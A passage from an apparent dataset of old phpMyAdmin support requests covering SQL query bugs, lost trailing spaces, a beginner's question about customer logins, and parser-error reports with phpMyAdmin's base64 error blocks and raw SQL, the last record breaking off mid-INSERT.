for example, this was generated on my installation 2.8.0.3 Debian 1) DELETE FROM `mos pshop product lowest price` WHERE CONVERT `md5 product id` USING utf8 ) = 6530c0980f9339a76214dca9f169896c AND `al id` =106144 AND CONVERT `productname` USING utf8 ) = Nikon D50 Silver 18 55mm Lens Kit AND CONVERT `grouped productname` USING utf8 ) = Nikon D50 Silver \ 18 55mm Lens Kit AND `shop id` =11 AND `retailer id` =208 AND `price quantity` =1 AND CONVERT `currency code` USING utf8 ) = GBP AND CONCAT `price` ) = 5.62512e 07 AND CONVERT `availability` USING utf8 ) = AND CONVERT `url` USING utf8 ) = http www.pricerunner.co.uk ref site=alatest feed exec Redirect?w=direct af ref= af subname= t=prdmdl prdcat=29 ret=9964 url=http 3A 2F 2Fwww.cameracentrecardiff.co.uk 2Fproductdetail.php 3FpageNum rsProducts 3D21 26totalRows rsProducts 3D191 26CAT 3D1 2 AND CONVERT `country code` USING utf8 ) = uk LIMIT 1 and CONCAT `price` ) = 5.62512e 07 is wrong.
Original URL https sourceforge.net p phpmyadmin support requests 933 https sourceforge.net p phpmyadmin support requests 933 Original author capitol","bug"
"24444","2722","Trailing spaces in text field deleted when browsing row.
When a text field is set to a value that contains one or more trailing spaces, the trailing spaces are preserved within the field, as they should be.
But when the row is displayed, by clicking on the pencil icon in Browse mode, and all of the row s values can be edited, the trailing spaces are no longer part of that field s value.
Original URL https sourceforge.net p phpmyadmin support requests 935 https sourceforge.net p phpmyadmin support requests 935 Original author coder4hire Found in version 2.8.1","bug"
"24444","2723","Creating customer log in accounts.
I m very new to MySQL and phpMyAdmin.
I m a novice with database design in general in fact.
I m building a website and my host offers phpMyAdmin ver.
2.6.3 pl1.
I want to create a customer login feature for my web site where customers can view their contact info and order status and related info.
I have been pulling my hair out trying to find out if and how I can do this.
My web host does not allow me to create multiple databases, and in general seems to be fairly restrictive in what I can do.
I bought two books Mastering phpMyAdmin for Effective MySQL Management and another very technical book about php programming in MySQL I don t have the title with me for the second book at the time of writing).
The second book does talk about how to create visitor accounts, but when I tried typing in the code from the book into the SQL query area, I got an error saying that the syntax was invalid for this version of MySQL.
The phpMyAdmin book does not mention anything about creating customer or visitor log in accounts.
Can you please tell me if it is possible to create such accounts given my setup with my host, and if so, how I would do it via phpMyAdmin.
Thank you for you help.
Original URL https sourceforge.net p phpmyadmin support requests 893 https sourceforge.net p phpmyadmin support requests 893 Original author miked55737 Found in version 2.6.3 rc1","bug"
"24444","2724","Alter table gives error message.
Begin KNIP eNpFTs1ugzAYu cpfKjUTYI0CT F3BiKWiT BrS9sqpoQ4OWgbRufQyeeOl22MnWZ uzVVFkhUTI EQrEKpVwOVyB9ZqUlRZmQsJ9KbGIThLTRze8jFMz0q490uFtMD4hqLAgGLNXzFsxH4xLIaTjo2t6 H prwIIk3 VzLGFpK3U8s7u8kl1ZICsNBBuVVgb2Sncd2jMiBZcykieB1K81NYdOkHyb3y1GppfY 1KKc4xClliBxkG4kzp3ZThfT8xzf5OS3K4grVaAKnmKF nZt r4ZpxrhVgf05dhcm G9 icq3SUP y5t9YnxpzHcU8x9a8 MPAZ9Ong== Einde KNIP Begin RAW ERROR C1 C2 LEN 61 62 77 STR xe2x80x99 CVS Id sqlparser.lib.php,v 2.23 2004 08 09 01 22 59 lem9 Exp MySQL 3.23.58 log USR OS, AGENT, VER Win IE 6.0 PMA 2.6.0 pl2 PHP VER,OS 4.3.11 WIN32 LANG nl iso 8859 1 SQL ALTER TABLE `zwemmers` CHANGE `bewerk` `bewerk` ENUM z4d01 ,xe2x80x99z4d02xe2x80x99,xe2x80x99z4d03xe2x80x99) Einde RAW Original URL https sourceforge.net p phpmyadmin support requests 895 https sourceforge.net p phpmyadmin support requests 895 Original author mbch331 Found in version 2.6.0 pl2","bug"
"24444","2725","Parser error.
Begin KNIP eNrFXW1z27h2zuf8Cn7ojG9nVi4B8DX90LFsbRxbdlzJa293OtOlLdimRZG lOSs99cX54AESEri i8S0vdN7s3E2OARw3p nYDSZfJ98MU6JcUqN8ej6i0EI8Rz8b9ewTZeYn6e34k98 vz59G76xfiX b7MvxvKf0VuQLnl6HIUPx28vb7 8G TYcg1qms6 meTfiGsQ94tJvzDTePx4SFb s1oYo7 ejH 5 fPUx c xF8M No JN4hXg0Xw1yBKnj Np0Y36e GCdfR9e3vxh3I7HqfRgb30aGc2x vrk6 SIW 8cS Z32 Ob BP DL9yn8TeTYMu6 XV ffh6fXH 9YsTRYL16GnifcaXPnwcDA 7 K3 m7zxeGj S dMZjYx2uxG8kPJ0Z70mSGqvggUfGn3 4IsFT5d 4r 3 dv1dDS5Nc5G45P Gp0Z375ef5 MjG X t98Lf9T4x58zzqM4 fMX4884CBbwv8Es5Uv4xVuyXD0mMw6 pEk8VsEv1rx6An 9yFMVy 454P4 mS94NIN WPBZEEb5r6JlusJ 52P28rLAv 2B Dp M9 Ne5Oxr NpsY yC G0W0SG 9BbFzy5ZJH R J3boIVT43349mxMYqW4utXaRCsDOLAD23btozbM jlXRDNxU9 BEE6g382LXNATYt6tiX 8fq3 8Tj 7yMTfn6dpIsgiEo 9dfPv Dip8N0zD4OXIcEd9zBqY3IPhP4rrZ8DP8CS2LJf7oF2oeacmY L2vEY9 nmRCLHNAvEwyy7SJC7 2qoLZX8yiYJb4vVEYcf7TJPPpgA7s6o65DXLZ4veugjRMfppc Dh0QOmBESWabbNdZWkXRHPhx Dg3zoTixg JEv7QmPPFcxq88 QHD4UFw39R J9xcgK PEuErorz V1cWjswdkAHRv8PqrrYrfnaRfDxy4zJJ5F90dJ9EEReLLrM9oKyyamUPdq5s163sgWqn69mHcZmu l3wRxLj4SRwHwjYYlp9tPDGGV5VPzTedmZbcEN 2BlZRf8R pMyb16GkP774vfP1 sE4TdJ3zvHr gzSIZ0GnTy58s1v3zcQUP5yKBYyT5TxYvMnviqIgfUmeDOa2OV1a3uPqJ1YWBAP69diYPr4Iz8Dj RTDnKV53 iZsfHa trrjo691H0u9ytq1S4PVvAkXxhXnS6FbD5zP4c9fcbG9am1iV775Hv wS Je mzf7LI0mMVLsaxx SOMV LOTFfCGCXoK20iP9hhxumot0XB5I1DcXX6uNA GbCBVLzsQqMhcjbv c8mGEBuNCJ8bQ54 vwgZ0Ip8FZ OX7fkwn zJ4OwTBhqDIe7zRqhruNpRzDIjZqIiExp7mp3BCza BU TzAmIUzdG4SvegmHE55lNY2pfrn7fsS 25XqFfVHuSOwMxW2ltXKAkbsVN FQw qXr0P9omDf hsESv3ySJOGr3OaUx0ITFjODmOq7v55u 25iWRY9ytc2hcPL R0RH86aP9xHc MQxtwYJ0l FdJ3 cdgGM5XWX53WeDbXp2629zbEAqyw944S4SbkKX8IZpuxE5i825dkIbaiDxnQu1pbZdgZvhF0 n8Z 30XMKqx8LHcb9jqzQoZ0zrZDHGMyPsLYJZ7l9kBK4VOTemYmhbiD4io4 jRkVGTVbwVYxP8SZgGc DCFyDhd6q8OtVGUpy72xTYuRnVRB6OeOhtr4BeiIRm3VM2FV46GKEOJhD 6Wgufj57hNnh7k0qh FfNmtMtg a7eEl vCMSJ1paD2YjHKFjNuzB 5PHKGAerV447chlxuLTCdaSRSCEMml8UYbHr7JXt er6 rINiEGapA6oTJ4sPV GrsFmGSD3EGckvngSL HhMdTqXv9ecjmWZrr4v tYqaZyG6IQ60m 9 vQTidvQpjz1wBsSvysOa5AFDehXOQZTvSbp8fElW8OfOg dwrsUQynxdI4YtBFHb4mgnp7So1qlQ jBv5OhZXRXgUY8w 5L09Xz0LscZ8DW6uvC CyU3rBHLsfF8s1Guvm3kBK3sqjkgk2qdR8IEX ILH Ii8XQc9S3l 7ZTyprm0x5NhpUZiJ2iNMCv8wzkTqvJR3Qzg3iLF 8GeD6gTmdLx7E1yx97Y6FVPk o0SrstQ q8GYMDSzoLHcmIZSj6 EOUFo6yhT8vsOX2f51M9jH7egusrT1d4KBqZV5G3ial4FqxfO 1z yrbhKtJkn8mRlNnfX4zGwgo r04aRalZjtcm9GdjU6fpvuBZ9Gg1alAYsPN3qY6rSgEm9CITL K2lrutLautpTXR1LSMQ6KSsDk3oS8b MO54uuBRGJLwPIlzO0yFP70yN83VN33NUbGy6pRtLmgUB WzpJRGy224rtuy ipPwB7RYkMQ VJQ7 ueaHRwOOCaGiCldBhOZ8gYEh ZaGyx6iEROLMGY1HGFN ZSswqBOIzw4WwXZBXUh1B2oPwQITeil2YAW JBE3IIhX1XRdBYciXb YacRK1c3abbcoWq wdWl8 FQE6lynjlKehsBvqEvrqEl5f1FpOMhC2k7ZMmi2WJc1L4cAmwoDGfPmY4K6v0yexDVmSmAfosPfT 81177xGrGIwWktVmfbQwfU9WK24MExHZCFFyfTwXzjQN5 n2q424vKyzm55jqbvoDpyqO6utylm2 rHt CFtwlmXM9 HqIYmgLCfzR2WmiHH R9taYP1hOLJcwSPhvQ9e2e ysotRZJqKKPd8vRLbzxcB nP2yevn9 lJVvvueZ2Y 1LYHnoq8mdh9aSM3DIFTLqRYnq5dHBzUeV3qZpafZcgr4z5YLsMYz A8 4U LRTgDZbBsbYeudu6 g6Fsy0VtU2YaT0EPn vTDp9rE1n2FmGaiJ3 DtJkIXNicQnTt2CWVQhR 4SaTmrDJslQubMKn5xpHRdhEtsSvFTHACJ7zaBH0JYXsA5iWUvxPMiqoVXwb7OEpVC57ksL2RSSv 3ZCKTeqlsGQVMepNDLgS5kBGku3PBKzgaSD8EBbRxsIqvSRr9Ie xUFmEFr3JuwulxIs4WmS4rpX 4qsj9EnDdB2H8eP8L6jnymo9auHodsMjCe1jtuURZqloQNwG6lRjeXvTDpVSbhtrl8miIgm4TF4x iWz7Dqjw0PQtlVZ4OjbbXY2oiuJl7qGnFIt0ORAfKw vmPX3szzrsLxjZp8OpQ9oG64z1yhC98tU xO5Q050bxNUp3vCm9jZ2KSU7BLP8d2hA9102NKHxbFrVwqHXkOs7YC5 FbIsBxf9S2V7YMAp6SwV WM9v4oL2LI9jDgo2VInjNoljoRMNYigDyAZILIJJkdrhH79EkUTE3dWSeV3uDtjQCTS9 ojtzS4r Y cnCN4g0xa2SvbZVrh0 sVEZ9pXXSKK oVd7Lw8LHtY2LG6LJwbyEUIhuLw1aHpY2unAVmsv8Np lC ej139l8xvrp ecr90sY6EFQmUtVTG8qKu eIIDVCugxY1Ieuzb1HMUjTtmlhlWSPEAkQK4rnQ gtmWKJPsGWTWnowrcURJ3MOhiIjKUQkF3VE6ryzP8pBeeK bKFm8ydOomibPbWsCurgPF8zQZZBG 0NM4rDBLRSarAgfx7bI05dSubmNlFqL75COzP3KRJYf6NGH6El7f9Gb3XEcW5UW8BCn9bSJNbhLD ib9DF9bQLfBRTdxEHOoVerDuwKTVfkUtzMWVPZPHFxFO52JMwteVoWPo4WWr5YXuiVBexdDghvwd cVtZ aRZAlDAYaeP61Orevy1iBfXl9iqFGpqBy3vEAhVKNUFNdZ8 zwTndBmAqGLesRqrupRmpcT RFZn6z1geVVvwwC6ZYvsYQjHRVhinCfJx LxZb1ONwNIT4eP4y76X2t9PIpp1PItM77GMEPiVJ1B 0MobuCZTnSJTJBJko7RVm9R5TCZ1aI0OEWenXahfHoGJUR6RHbx4NSTaufgnWLyAPhSXQSQxEg4h gkDUB7sFCKX1gvi12EAOFoHQt2AjGBAB6FyaYG2BL2pMkev7nraEIn9i1RTSb4gDPFdGo5A 99au xEIX9QoquR0qVYnOPWkWRaA2XSXpx4Z7cOvdw848tl4XfdkM ea4x3cv1tYKvS1vhC iT9cz a f3YXbfMl8ibAwKdUVhexUNKxsr6fCvhUIVxr guyvbD90zfbC9L8ugVPRBodoc9KAUmfbWJP1pb8 ggZsx0JXAgMf 8SBOAJpGyZ5eii8k5ARN8bq2yT5drHJ8H9zC52sWDHfe72qj6kN XwXP3GViHNd 9Rd5WCLvUB1NFXn4DZGHj42MYBHy3iQRFs VLb5SVkrMBuvv 9jy uhNEKGH1sDquiPENDEdS4U CbVbZiapinrfNxez6wHgRLb9e3N tg0BqVv1fk2lMmLSLBbJa5rTRMOkH4J5ZhgLraYdbVfimxls C2ksVBtGJYzbeCJMpqhZpb9GlCY9rThDp 4wLN17uhfxqPwshU4ltCU61bWyw AIFGxMuwqdaoqL ROisC8w9XEmr0y445eJ2D8WZjsfgZlfxtT8BvE4CeFKARw51ir40E1BB oCa1cuwzU5W1MEvoFAR p7TOVO77sXEtrkOwzhMVHbqfjOo6cbanbSYgc4p hGyXqkI1I0heGYfLXm5opwuCVBIRnQQicLrn DxKWk MqbHc3r2Lf9cAcjWbh6uX Zjkr4yccEoRVb3w9D4konLMIUVb93Xkb6YLexpWnTVceuSK hiLv jXlYvnwL xQaJgEwdKwHFWdPalLUZmfxwaWi2SF J47Ikph25EfdlUUMEfXx300TJw8N wk f8evPxQPa2XrqG dt6yBP3A3sHgNzLHMCD2HMoY9T5KnnWfytdWZeHTglY9EAijdJveIJJIzAMFH FUCrkAZhQxDIFxg1v 9iWBHLYpkw5sC0dA1DUYlIvbIimeRCnIWIVSbBjCOjTjYaE3FqQQwKq6le N7sKmxbLoQEAdy6AzjVhtClqQj7Jbfi64IfW9T1IIMnWOt5O0DNB8sgZeOVJ JpvQhGYYLUGDG3r stUsnIdtpXv5B eI4jWs3EI7xu93ddw2qkhlFpSzSogIthUtWrVaSBeZiqQ oxOPVqsUqwtFUACl uqq7nRfhDKjnEMu1S2gZ6m4FMNbsC9jQURrO 3xVUAogkXQcwsux2AKCz1utCK3dRgiITCulSB Ou0SpFhaEtawKV6hASGb8MK8yvZb LhKhO2YCak0pokYt5e7dNY0NcDU1W2AinMpCLPpXZAtcg2j GWB gnhWhuW7e6pMwy4wCWBJ1nNjGoev XkMFfiAmFbblbsxcQk249NV37hOEWLRcmtcXlqrAcVE kCoCPPsPoSLvmYMvYYjMhixDFyJUPdwRDlY5NtUZY Vbg11hgF3vKce R2JlxOyDl6WdlrUzTN2Q r cAtMxb4DyGPAdia6JU8PR2hwqaJJ zYAvLNGCdYNUE2R8YYYEl BoFDzkrXVgFEXGLzF9n bYx rjNM1PZdVQ9zdNUDRKEtRHFzxfg1EkZoWTTVsjOuw6txXfXBI1RzowHM5XbcEw8L00A6CMGZD5Nk kZXoxeZDBrpB0Rd T8r3BlcSJiPLGZeVbziK60BkIdmy4sAx0 LalJ47XUFLZrB8 cBFaodXgEez 7gMRlG9iNM97ILJVIRxpxbghyPaYhgsRPIzCKPlbtqDEFz6kgUzBQoNorP3kYkcBzjMZ1ZhjFccp sLvVQOskFi22aYA2FsM1zPTiPOHv3NAojd9Pe4N1EuR XAV hQucvTEMYW2o RjM SlWCGkewxCz mrMkzl0RfOY6fDIKFb 6g6cONbdhaVUN2m6K3ZHhMUlEPjMMHucydj8P lahM9O51bA 048Mj9F7 KMHMyfqHyGtf84kQOnu6O23b6mlYTtm4a HmsvrC6B1an6jhVMdcw10Gnwk memYg6OISBX 4jag 4QhyOa6Ehq2NiyDOxKgqGmvUM4s4VqEBWECE0h308nw7PmVyYPOXPz2J5ACtz8lypTrxJSiozfas o9Wfh2R5fETvIReWT6TNK9kJA2xINIPhGOUOJM0mU zQAuaajqYMW5oyDAFQM8uAIPUDCs rfqUR VtAsDE B0 Gah5UgA0TybnAK1JCn8y04QcPWfvn6sjY6tLP02kO2fbHs4W0rNGwaCVtax3Re3J z 5E1zMNrYR9bpilhyySjhS5UugWeoTC xe3fOyPaYvsrRdXstfHRUTo2OWhy6I9GJH4d q9PtW12k 1YktPof2VlxNjgnTjujsthaN2mkkE9IozgMAvUySZSgjn71KNk6nW4X8idF7cHilqAvqlziSWxbJ m3zHn1d50VDs zO0f6mlHf5NTU3Ed31t u3BRoOvsaiMhIlv8XMaznqrziDHeqM404R7IsiSOJml YW C2AhM9btLYkmceobP7EEUOa5QZeIdRLHl fCNgtUhFStzYGlcTrlitfvSOgqwVAhQz YNUIWB 8LfARhp9D7IoxuAFDqtTdVNYLz FzByfraHtIvNChIqtlxg4ajb4aFdWJDTW141YolueqpzacA4 BmbvYWzcCxNyJCuaImQ2ZP6bwdephgle1rLvLEdTrqhGzSq0FmtqgrhyeCAQ8DBtlV5jsp4l0RPu CmkbNVZztIbpaSSP2rM5bmcYzIsQTVKTL0XMtFwmEsLznBEpeh2l5iKGb40N2eskM IQF606cLDt TisiWk94qA8DY M8Z0jXcYCtJt1fOduBUyK2l8 jsCUuxuo4tU5aR 526HFXhwA0LAuW8LJXBVQh aAf1QwIHNMWHQbSQgcqQY9mwSJdDSzi9qOMu5d00OYeBdAKrE8negFJVks8wNM45FNDjvGyA6Yqa ZOeSjBIN8xf5x3x W h6G1WycRCoIZVHk2QllDDQRSv6M iDBAkc0OJaBB8xxxGK4jjicF6N4VxN Xhid9cYiJMjgAAJ0Dys7TqeVST7t7LCK9afCLGUYrLVRs65HDHoSwMzTjyY5OiJE6vXPk7knWMBS Z7PCeO7e3BTWSPxW1RjUqyGyNpB6XpjaNOZJnKRYSCp0 oe7mneOR33tgR3dO2ppCpC8MXrPcLSH 9g5cHZvYpRF4lLa4EmAbh69JqmzSDZdIWlm0h6o91k6y ponrud5qXIvBaGEWr6vihRQ0rKrJZwG SXLoXoJTrLCimPnKIi3eqqfFqyPKu5AojalJHSqO9xtmaBOv2O69S5N8Au5lmiQxQkkN26wOd5aQ pwN0xc nRh0WK3dhkhCkctwfH7ZkNSpqWBKxLwksFxhAp83TJGDY3UUcSxkdv9nsJABOUH1PwBL0 tD7ttH5GXhNbkIHY4xnq3Vl6bJykoVre zmfb2XtyyDX 2Eqm3WFQMRpEYiYpXgsszn15g95GzB3 s7r0WaeluykWMjeAmicyj5to SG7RHcwBiWA byb5I22F73hYzOeGs6TDMFqLNFm3ETBSthVtK3O nuFWw8qyV4Ej6EW8hy9x4N OY H6s9v1k5b21QyokPcHlfEcgMq4G1AZ0jSKF2kavx73J4lTmqne RRKC5VoYDnUJ2RfMvZVrvPAVRuXZGwkoyR 7AHeM2r6aBlRoF6sSgNeAXaFI2vi6jsMIwrBeRPEw GFKyqFZWPTqUImNjsn4QirmPHDufM3DqV7V0IaCnz0c4vLnHUdiqXXQqgnPZm1Gz knjrH9xHV1L RcSsMNLcMZtDQIqkDZzxevDyso5MirABv82YWYq8jdMXsbqwz8IjdxNEZ2Vd6IMUuRoXSbLsYd8l 7JVV67MNO 9LLHL8YXyF8YDyLxeuLhbWV1ZHWJtszO5AG6PIvcinSNyJQ e YVLsegxmMeLRLUo bUez1yd1E46IyAyyrWBQqXaqd7BeGwnJMQyHYgo70XUo0kEkGjySjuo7jBbZ tCF3 6hC8sirmY3 2qVxnXSLMlQlYngF4hXHcDziOtn6hGVizwz2pBM2bIWFgcoiw0Lvm6XvR1yhJBvQJ JRseDXNOBP cl6oyEAf0gTUAUMl3wrUKZzXXUjby4t1QGErVMk1Or9eIAfr0aCbpxF z8EVi7cQoKcPyCBjmmZ e9blUjZcAVdPWVlwaZawMp68ZXyRjt3yhuU87JaLGy7yoMwFAsX5UXypNEKWRo6dTnfYQsdxcoqI AwbA3XhAqWnGGUWaCLZsbmG U0dB1Ne71UG19V4ACSGyUdTPSwSA5hl41ck 9XP KclKk c8fF1l Bfq7KFjKOkOhFnReI4RPbKcwXols0GOa4HsUeSCT9Xp2kCB2SRCmXzBTgjQ V4GMEHjzRmhApgLD dbzSk4OJ9s XuxWhExuEIhvkLExEQPgonxYSzmfxkCwNmk9xcZhxMvzv9L juree3KICaOZaQ1eO FikgZ3ye92svo CtAOjShLGbqzov5BL9EgWE5aTzEx1IAjmZGdMVPm6kHVHer S0Ka6b3SpyDUsN WDELlUGSXwfWcC4uWkDA1lwEj8nDcludpIC0vb2pdc9qmrYF6WR19kDztnhYqliElWf Cq CuXbt q2DKaDBSeGKG6oRSDZnfQtyq3BlZL Tzjx6lcUBpaVUWu n IjPkAlbsd2MGpPEpoA1RSF5GxZju 8SUbfP2uZ3fqh9skDXS7JMxzmJLE04NE215dpIgUBqP0IwrDYY4bstRHNEyNDsQaSJrR CrgXcfp G7tLWQYExMdljOvgmQvFTOc864M vUf88SXnJ uUe3q c2RLp4HkFOkiEOTDexRj4dfwu0 T9TLg cmyLDivu7nfl S4hR4WP9wthffPYRop0kfuMmN2PathuidrXQU BnH6Pgqc 9ZTgo3JOd2Gwy8Lz cZ696IeDszPIdl3dfUS 1ORVj4qKNBoVh7UUxJIU5ac46IvMgXzHIsXQ31GYqjyohqBHrB9nldPJ OlzJWCwVKosZmSx0lDg9gM8XXncrfb2VxiKLRDr8KVetGZDhdP3xWB3yZRuj07qxl4Q6Gs5rDjbg UrRxH3KYIwDtF2 rLDRcvon0MIyfwYQUUCxnO8pFzGRWwYAzDXJXOZJdM2brE0oiTekKn1gZ83WG f9Xta30thrsqltRyio 7kG4kL4p0k5MP8ZeuerueOAp4j uZcVAOjddL6Nd2kCqKhJSL8O3QteHp aacRA1y1msj kCWCkUhdI4UhQvrlD h9q2vbMrdQfvMdQPbHGAv2B308vn25gYBujO6Q7SHxlAXz UHTotNmhW9Q0VfHW2 LAVP35I8fjJH4NiiLcbdqnNgD4LswbKt 1SNKwP cAxtnU8aSqXjfsgKUY sDUklwLH5fK6HccFnnK0O1NcKLI UJ6eiiieV3yHVNUu KYEEZkgOQdy 3BXP5tn04JAxfZai 4O 8kMmYY Zh4MF o0cvr7KZsukOe3BYHUC FLkqYzWz1ykHgfVkjrN76dIU8ln4h1WwyKd1iV6AttB y3aCdlIno 0CxPEC5gKnOVpqircdh DpEVBXtf0Tp BMpF0eDUxbxQVISzmD4Gx5uHXuuP8ILxRL ADnHGCZ rbLcqjCDy kb1U6RcnJzLPnVEHpLgDcPl QTu1KjbIrV92vX9xRUzCgXcNzElohnfSq oNJdAUG3vXZl5CGT6vvsHZ1LeGMqw3VrStZ1jcknnk91bk 1PFIVCtZHQ0g1uSzMIRdm7Y9AwgDL r635u19bUxhfjzlboe5ZVFJvZpFpMi4QLnuQQxg VhpR3EYQZJjI3np knhY8Sh18lq4Hkk6ieb8 50rSZlPk Hx1T07g6Yr3JJE00erbiIW3 c5 3xUbEJdoBEJl9Je1A ZaNpbIT5EjjXu8MzDX1 t4 TpakhmRswhPAqz31tzmtJxpS c7Ie9CnLpPuuoy0lWuOFtX4VCA1nifP3DjB lBxrmI9pd1S1AHo emwMHK vzmfclWyKaCALxxtH0gar4jsdQJsUiSswJxQGS Zg0XyozEfwGMarF1mE0gnfyW1bdFB9 4Oz6Bfp6 TfXX0NKmKaUanQW2fEEU WNelO HoplUsnc58 LNcyb0fQxqz6 Mn1bz3inA9qJOUKR wDLF9LInKbDw4XbiTVDkr9xzIJIU8KzT8PkFGPY4PlEnvx0nzddfRI l40cOX5h2WtgqApT6C60h vqSaFaGGnjXG1shdma6X2MspdIaFbZzLPNspmKQ 2rWFCSJ0SLUV625m2uVCELJXILmtb1G3qcHY nU7FVTPw mzU4zZsvOvpNdUbkKgCg AnQfChh4jC0 SosXmD3G8evuV32gU5hGb2yg9f2Xa7rOzL N4bBGzUUwS bi Dw8hDtxqSjPsneHzi4Bo Fx2KHqNXymG6LW8 TiD9l883bSbDnjUe6ymi5esn6 dOfZewuXQbz6AdUtNICFLshk19snRM wKnmhfy 5RQmiuSVryJ hLkbIrMOOJjFHXjBh9Z4QUvV H6Ea2hEviKQWOacU4rN8MMkr5LkwhQyl8bw9UawNh OUQQa9pMKePbBKk55bBCtIdilNxetFFHyY gvgdZfEkbHJp9NOzs7DsudGy8xtexqG X0Q 9OfBZUeVVotjm8P3K9rDkAxzCfFkj GEJ5IKuzot 0GsUheRzn GuCKcQZFVnKNsvM6Oyz8z62kCSIflFP912yMKdXixiJlPPQxhXPJKzOm9 yDExsOZ Eebj 22ppWP rpJlqtFIFmOz1nIqrPYHf0HwnzmH5UnRJX6D2796tnzACIuOnh9i1TAYN4ODaTl W bILBIV8FAZANJh6XJYnRSVu 5ms3L3kOBTjQR0R1m8eg5gDkcBTAjtxRx6OKm2CoJquAt 7qKD hUiphT gG NSLWOoJ6ZeSNjHxhgAQplQPC8rrrg oGz8lok9QwLMJIw CiKI0B2fhsH2iI6ezs93 QtDMgV KEWQZpf4MkOWScY7VBJD8De9xkoTZbSg0Bf YOcuyMAQBoiizWlaoPwqigN6b01naFlaU G BzFJiHc9U3 H9mvShMP2UJ8wfAVGRMaOP8GBqEhYnSOnaY1o7T1fO0oaJPN2KHhoMCk ktSuKg ApErJpdMA47P62Z7W76p2XmeBsOrWL hpBC9yB8eQt4v tmsGHPS5qwcVYHpU5YqV6jhdNws3 31 6pam77a u15xAJ5QYfzLbwKEMwIqYhQt9eXVU9 20oX05XXoUTkrLuGiSNOLbAyZNLdhPoyyg1yn 7eSCifl7yIVcG2B5JT9D0ym 3rqRttXmbQyZN5MgensxRAD8vL2UozrmO2o5 w3RZZTmZXUeF16N u1Ms9bxxq6Erl3UPfFtmvhe2BRlTIbGWwD6zoZTEkHZzVRqhCMNYgvj5HSG6VM uvrqrOxUzB9Ew qzSpSOUp22SxyrJYmZp F7fknWfzNhNeuCNyXxziGBN8VGoUwiiHSlPZcYDNYG4Qspz6s5FTteMg mhnGN6j5 s2lD8DRfXkuq4t8w7sGjBc8c wVjsTZvg1u9Uh0ex0AuCJKeIU t9YvTGuKbh0vlbjE IYVJ46TKS6X1 EWQPTlOQrFfpRjtuxHOUzPHmVbwJ92A2WcIQ0HHoEYix3JIAdjbkwD4A8KfRqm Cc xHo6 ttPf60oOHs0SWgZPQpDCgIcMmEkapgYxJORcJHP E VyqmLRpmFGDLk5ssv7U QCDCMt PcjVdsNYNhEj4gvjJMhY NPHZLWqTOcTydEfdW Je0y HAcjxO3qdI5NWao5GssMciSsjXHy9saj F2kEh3z9rGamUD1L9n4seerpXCT08HbW40vwtNJSOZ7D9BwqGCXud8KWMCTtwGygwMi17ivPMoaz JH3LZxRZSqS7RpFsz1QiuZqNZ7ZqwjEmB6iFKyFRz1skn wrGibSQh47h7z0fmJIMzLdjifm5I g 9HVinwon5hYoi2arZgFjrs6vdNBeeJuRODq OD2vHaqWj3hz7NLrtCrCaBr0wZjs6AOkQU jxDxY tZJ1NHpZ1zezfarH4ArbY1crMm6jtuP4DSgE9CaK2JeCjqvXm pvMPJ9INDpTQzbL40jaSsHKSAe bmRhSE2M1tJYrVr9zGSOUww3aOP5VCMf ZZMIkMOGJWaV6oh4TwTfutdBeitJ5aW2A6q0Ww10GwZ MoAUrq6AYK48LM0a37i2CPF1Bm56pR689JlOkxLJl2cAjXAlMrssMC68h6fL9zfTOmKU45uFZ6c2 5HAbnvFlSAXKsCk9SZLhEkg1Wq83cZaT93ou1 HrWz7oHDc QwKo8ZV3J1vHV0JLVokAjy1v8J b 0AjMcnNKyF6bsYk0L4HF6r0OPkwjeeA9bIEjbmbhUUK1BU7jFvg5B P 8yBsM 945OPWZ qZhgJS qfaZBsfLwYPCZAgxTKtQGmrhdSVHKVwYd2H8GAVhmg0af0yMtyRKcrulR0 fXNSWyrwy0dbsFpTY VHWnf8OzOMqnT66XkvdNPf1u4rCu4MIo0bM9ShXEFg 1MGQvITG Rzm6TIFmSFuC2YRPIf pm1Hv cG2JGXgM95ajgm1svwnyZYiX PCVbb T7rtYmYwDPfRzHSJnr CC190uKKVLs7EYvuuhGhRzvO0P 1HlV2 AVgpzbF76W74euUvmgTP40EzNbzYQntuvpmfB KeSSkwAbboCfvT8cAbBV5r6Qpcs4YyjE yYs8P ORDIYspXGS8vhv44zn1Uf4m0P9nKpODi7qADTUVzQ1F3z45iBEpykgR JSrpp3QoK3bCx2 AT3i1YNHdCWWddoIqtISkX2lOairTJRzWhHlLMvzjrYza5u5 wypSxeBiHgRnTD9EeKwVlmT5iG8 qYlpImP6PZvLpozWz5mujl1kOrMd43o3O jIapIPe4o1cGKvcO 5QxZxwnn0yrHpQvRMoEld c 3 mbN9l2gLL Lk0 LCLMVOi08pTCPO9aNvxPwZvEKG5KMT4dixcvaUjUwP50FcUlmMdM7HlUgHBtn7 ruvYttIYe1AskTs6wPi0O85xclsWlnoX4z17F16n78fBQ8FTwKMo6LwFxdmVnoZ2Kcxr06OXzFVT 2wrv2VWteLGHVNetsCy7MLCD6Ga6ylWtppATSUbf3hPj3fhDNtsgSUVs4pt aIRQ8jNYhwyJRV 7 WttzOq2dtYz6WdvpFMshZei2r7VVJFOaZV5viVy78EjAJJhxjYK SxBbB2WBAldoFyLYYkzPlrYG G88VeI0a4aihCP3I4eMUHUa6S4Io0PUjVq2zZiY srLRLbIa2Ev7qkPxHeq4JxG6uQdkD42iKJSR 3CRJPipPQbb3S53UEflCkHcOYSZZnNfvxsHq5QO V3uDuoSTuoQWX PACK4V3BCpQjd8lWGRv4lF ZfG7XNP06quI 9HuGTKExsFaLH4bzAF023llnWtYun5Zefdul08o64GnezdD0EZVviy8zmlqaW5u a8djOH5hWA6ljVyZap8NmUQwLKd4MUb6YuxxM2S7xu5WGEECEVR1 bzXbcEHErvviiMfSXgNFn1K 4zBAE7ndxXE1QnC6COWrePdh9MIj8U BG9S0CpTP2oTMZ7amuJiFcbAt5rv8 8CF22c3w== Einde KNIP Begin RAW ERROR C1 C2 LEN 11186 11187 50710 STR CVS Id sqlparser.lib.php,v 2.47 2006 01 17 17 02 30 cybot tm Exp MySQL 5.0.18 nt max log USR OS, AGENT, VER Win IE 6.0 PMA 2.8.0.4 PHP VER,OS 5.1.4 WINNT LANG nl utf 8 SQL Gegevens worden uitgevoerd voor tabel `zwemmers` INSERT DELAYED IGNORE INTO `zwemmers` `deelnr`, `naam`, `adres`, `postcode`, `woonpl`, `telf`, `birth`, `aangemeld`, `medail`, `medalsrt`, `tydhhmm`, `bewerk`) VALUES 1, Ton van Kessel , Pater v.d.
